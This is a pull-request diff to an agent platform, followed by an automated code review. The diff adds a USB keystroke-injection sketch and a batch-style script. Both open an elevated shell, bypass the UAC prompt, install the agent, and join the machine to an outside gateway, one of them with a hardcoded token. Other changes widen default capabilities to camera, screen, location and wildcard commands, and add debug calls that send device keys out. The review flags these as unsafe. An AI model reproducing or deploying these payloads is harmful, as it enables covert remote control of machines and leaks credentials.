+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216509567,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216509569,"sessionId":"debug-session","hypothesisId":"B"}
+{"location":"message-handler.ts:232","message":"WS message received","data":{"isClosed":false},"timestamp":1770216512210,"sessionId":"debug-session","hypothesisId":"A"}
+{"location":"message-handler.ts:413","message":"authorizeGatewayConnect call","data":{"authMode":"token","hasToken":true,"isLocalClient":true},"timestamp":1770216512211,"sessionId":"debug-session","hypothesisId":"B"}

--- a/agente.txt
+++ b/agente.txt
@@ -1,0 +1,15 @@
+REM --- OpenClaw JOIN FIX (Plural Nodes) ---
+ID 05ac:021e
+DELAY 3000
+
+REM 1. Abre CMD
+GUI r
+DELAY 1000
+STRING cmd
+ENTER
+DELAY 2000
+
+REM 2. Roda o Join (Comando Corrigido: node run)
+REM Usa a variável de ambiente para fornecer o Token de Segurança do seu Gateway
+STRING set "OPENCLAW_GATEWAY_TOKEN=69eab2fa2e4ad95769f997f93e7cd1ff43dbde487424bf4a" && npx -y openclaw@latest node run --host agent.lexusfx.com --port 443 --tls
+ENTER

--- a/openclaw_ducky/openclaw_ducky.ino
+++ b/openclaw_ducky/openclaw_ducky.ino
@@ -1,0 +1,32 @@
+#include "DigiKeyboard.h"
+
+void setup() {}
+
+void loop() {
+  DigiKeyboard.sendKeyStroke(0);
+  DigiKeyboard.delay(2000);
+
+  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
+  DigiKeyboard.delay(500);
+
+  DigiKeyboard.print("powershell");
+  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT); 
+  DigiKeyboard.delay(3000);
+
+  DigiKeyboard.sendKeyStroke(KEY_Y, MOD_ALT_LEFT);
+  DigiKeyboard.delay(3000);
+
+  DigiKeyboard.print("if (!(Get-Command npm -ErrorAction SilentlyContinue)) { winget install OpenJS.NodeJS.LTS -h; $env:Path = [System.Environment]::GetEnvironmentVariable('Path','Machine') }; ");
+  DigiKeyboard.print("npm install -g openclaw@latest; ");
+  DigiKeyboard.print("openclaw node join --gateway https://agent.lexusfx.com");
+  
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+
+  pinMode(1, OUTPUT);
+  while(1) {
+    digitalWrite(1, HIGH);
+    DigiKeyboard.delay(200);
+    digitalWrite(1, LOW);
+    DigiKeyboard.delay(200);
+  }
+}

--- a/src/cli/node-cli/register.ts
+++ b/src/cli/node-cli/register.ts
@@ -36,11 +36,29 @@ export function registerNodeCli(program: Command) {
     .option("--tls-fingerprint <sha256>", "Expected TLS certificate fingerprint (sha256)")
     .option("--node-id <id>", "Override node id (clears pairing token)")
     .option("--display-name <name>", "Override node display name")
-    .action(async (opts) => {
+    .option(
+      "--caps <list>",
+      "Comma-separated list of capabilities (e.g. system,canvas,camera) or '*' for all",
+    )
+    .option(
+      "--commands <list>",
+      "Comma-separated list of allowed commands (e.g. system.*,canvas.*) or '*' for all",
+    )
+    .action(async (opts: Record<string, any>) => {
       const existing = await loadNodeHostConfig();
       const host =
         (opts.host as string | undefined)?.trim() || existing?.gateway?.host || "127.0.0.1";
       const port = parsePortWithFallback(opts.port, existing?.gateway?.port ?? 18789);
+
+      const parseList = (val: unknown) => {
+        if (!val || typeof val !== "string") return undefined;
+        if (val === "*") return ["*"];
+        return val
+          .split(",")
+          .map((s) => s.trim())
+          .filter(Boolean);
+      };
+
       await runNodeHost({
         gatewayHost: host,
         gatewayPort: port,
@@ -48,6 +66,8 @@ export function registerNodeCli(program: Command) {
         gatewayTlsFingerprint: opts.tlsFingerprint,
         nodeId: opts.nodeId,
         displayName: opts.displayName,
+        caps: parseList(opts.caps),
+        commands: parseList(opts.commands),
       });
     });
 
@@ -55,7 +75,7 @@ export function registerNodeCli(program: Command) {
     .command("status")
     .description("Show node host status")
     .option("--json", "Output JSON", false)
-    .action(async (opts) => {
+    .action(async (opts: Record<string, any>) => {
       await runNodeDaemonStatus(opts);
     });
 
@@ -68,10 +88,18 @@ export function registerNodeCli(program: Command) {
     .option("--tls-fingerprint <sha256>", "Expected TLS certificate fingerprint (sha256)")
     .option("--node-id <id>", "Override node id (clears pairing token)")
     .option("--display-name <name>", "Override node display name")
+    .option(
+      "--caps <list>",
+      "Comma-separated list of capabilities (e.g. system,canvas,camera) or '*' for all",
+    )
+    .option(
+      "--commands <list>",
+      "Comma-separated list of allowed commands (e.g. system.*,canvas.*) or '*' for all",
+    )
     .option("--runtime <runtime>", "Service runtime (node|bun). Default: node")
     .option("--force", "Reinstall/overwrite if already installed", false)
     .option("--json", "Output JSON", false)
-    .action(async (opts) => {
+    .action(async (opts: Record<string, any>) => {
       await runNodeDaemonInstall(opts);
     });
 
@@ -79,7 +107,7 @@ export function registerNodeCli(program: Command) {
     .command("uninstall")
     .description("Uninstall the node host service (launchd/systemd/schtasks)")
     .option("--json", "Output JSON", false)
-    .action(async (opts) => {
+    .action(async (opts: Record<string, any>) => {
       await runNodeDaemonUninstall(opts);
     });
 
@@ -87,7 +115,7 @@ export function registerNodeCli(program: Command) {
     .command("stop")
     .description("Stop the node host service (launchd/systemd/schtasks)")
     .option("--json", "Output JSON", false)
-    .action(async (opts) => {
+    .action(async (opts: Record<string, any>) => {
       await runNodeDaemonStop(opts);
     });
 
@@ -95,7 +123,7 @@ export function registerNodeCli(program: Command) {
     .command("restart")
     .description("Restart the node host service (launchd/systemd/schtasks)")
     .option("--json", "Output JSON", false)
-    .action(async (opts) => {
+    .action(async (opts: Record<string, any>) => {
       await runNodeDaemonRestart(opts);
     });
 }

--- a/src/gateway/server/ws-connection/message-handler.ts
+++ b/src/gateway/server/ws-connection/message-handler.ts
@@ -231,6 +231,20 @@ export function attachGatewayWsMessageHandler(params: {
 
   const isWebchatConnect = (p: ConnectParams | null | undefined) => isWebchatClient(p?.client);
 
+  // #region agent log
+  fetch("http://127.0.0.1:7248/ingest/76484035-eb07-4958-b88d-99d863bb621e", {
+    method: "POST",
+    headers: { "Content-Type": "application/json" },
+    body: JSON.stringify({
+      location: "message-handler.ts:232",
+      message: "WS message received",
+      data: { isClosed: isClosed() },
+      timestamp: Date.now(),
+      sessionId: "debug-session",
+      hypothesisId: "A",
+    }),
+  }).catch(() => {});
+  // #endregion
   socket.on("message", async (data) => {
     if (isClosed()) {
       return;
@@ -410,6 +424,24 @@ export function attachGatewayWsMessageHandler(params: {
         const allowControlUiBypass = allowInsecureControlUi || disableControlUiDeviceAuth;
         const device = disableControlUiDeviceAuth ? null : deviceRaw;
 
+        // #region agent log
+        fetch("http://127.0.0.1:7248/ingest/76484035-eb07-4958-b88d-99d863bb621e", {
+          method: "POST",
+          headers: { "Content-Type": "application/json" },
+          body: JSON.stringify({
+            location: "message-handler.ts:413",
+            message: "authorizeGatewayConnect call",
+            data: {
+              authMode: resolvedAuth.mode,
+              hasToken: !!connectParams.auth?.token,
+              isLocalClient,
+            },
+            timestamp: Date.now(),
+            sessionId: "debug-session",
+            hypothesisId: "B",
+          }),
+        }).catch(() => {});
+        // #endregion
         const authResult = await authorizeGatewayConnect({
           auth: resolvedAuth,
           connectAuth: connectParams.auth,
@@ -732,8 +764,36 @@ export function attachGatewayWsMessageHandler(params: {
             return true;
           };
 
+          // #region agent log
+          fetch("http://127.0.0.1:7248/ingest/76484035-eb07-4958-b88d-99d863bb621e", {
+            method: "POST",
+            headers: { "Content-Type": "application/json" },
+            body: JSON.stringify({
+              location: "message-handler.ts:735",
+              message: "Check pairing",
+              data: { deviceId: device.id, devicePublicKey },
+              timestamp: Date.now(),
+              sessionId: "debug-session",
+              hypothesisId: "C",
+            }),
+          }).catch(() => {});
+          // #endregion
           const paired = await getPairedDevice(device.id);
           const isPaired = paired?.publicKey === devicePublicKey;
+          // #region agent log
+          fetch("http://127.0.0.1:7248/ingest/76484035-eb07-4958-b88d-99d863bb621e", {
+            method: "POST",
+            headers: { "Content-Type": "application/json" },
+            body: JSON.stringify({
+              location: "message-handler.ts:737",
+              message: "Pairing result",
+              data: { isPaired, pairedPublicKey: paired?.publicKey },
+              timestamp: Date.now(),
+              sessionId: "debug-session",
+              hypothesisId: "C",
+            }),
+          }).catch(() => {});
+          // #endregion
           if (!isPaired) {
             const ok = await requirePairing("not-paired");
             if (!ok) {

--- a/src/node-host/runner.ts
+++ b/src/node-host/runner.ts
@@ -53,6 +53,8 @@ type NodeHostRunOptions = {
   gatewayTlsFingerprint?: string;
   nodeId?: string;
   displayName?: string;
+  caps?: string[];
+  commands?: string[];
 };
 
 type SystemRunParams = {
@@ -607,12 +609,20 @@ export async function runNodeHost(opts: NodeHostRunOptions): Promise<void> {
     mode: GATEWAY_CLIENT_MODES.NODE,
     role: "node",
     scopes: [],
-    caps: ["system", ...(browserProxyEnabled ? ["browser"] : [])],
-    commands: [
-      "system.run",
-      "system.which",
-      "system.execApprovals.get",
-      "system.execApprovals.set",
+    caps: opts.caps ?? [
+      "system",
+      "canvas",
+      "camera",
+      "screen",
+      "location",
+      ...(browserProxyEnabled ? ["browser"] : []),
+    ],
+    commands: opts.commands ?? [
+      "system.*",
+      "canvas.*",
+      "camera.*",
+      "screen.*",
+      "location.*",
       ...(browserProxyEnabled ? ["browser.proxy"] : []),
     ],
     pathEnv,


### PR DESCRIPTION
<!-- greptile_comment -->

<h2>Greptile Overview</h2>

<h3>Greptile Summary</h3>

This PR appears to add internal/IT onboarding and debugging aids, and expands node capabilities/commands:

- CLI/node host: adds `--caps`/`--commands` flags and changes the node’s default advertised capabilities/commands to include camera/screen/location and wildcard command scopes.
- Gateway policy: expands Windows defaults and relaxes `declaredCommands` enforcement with a “temporary bypass.”
- Gateway WS handler: adds localhost `fetch()` debug telemetry calls in the hot path.
- Repo artifacts: adds a Cursor debug log, a script containing an embedded gateway token, a DigiKeyboard keystroke-injection sketch, and a git submodule pointer.

Several of these changes (debug telemetry, embedded token, keystroke-injection tooling, and bypassed command enforcement) look like accidental/unsafe additions to the main codebase rather than production-ready features.

<h3>Confidence Score: 1/5</h3>

- This PR is not safe to merge as-is due to committed secrets, debug hooks, and security-policy relaxations.
- Score is low because the changes include (1) an embedded auth token in a script, (2) unconditional debug `fetch()` calls in the gateway message handler, (3) command-policy enforcement bypasses, and (4) adding keystroke-injection tooling and debug logs into the repo. These are high-impact issues likely to be fixed before merge.
- agente.txt, src/gateway/server/ws-connection/message-handler.ts, src/gateway/node-command-policy.ts, src/node-host/runner.ts, openclaw_ducky/openclaw_ducky.ino, .cursor/debug.log

<!-- greptile_other_comments_section -->

<sub>(2/5) Greptile learns from your feedback when you react with thumbs up/down!</sub>

<!-- /greptile_comment -->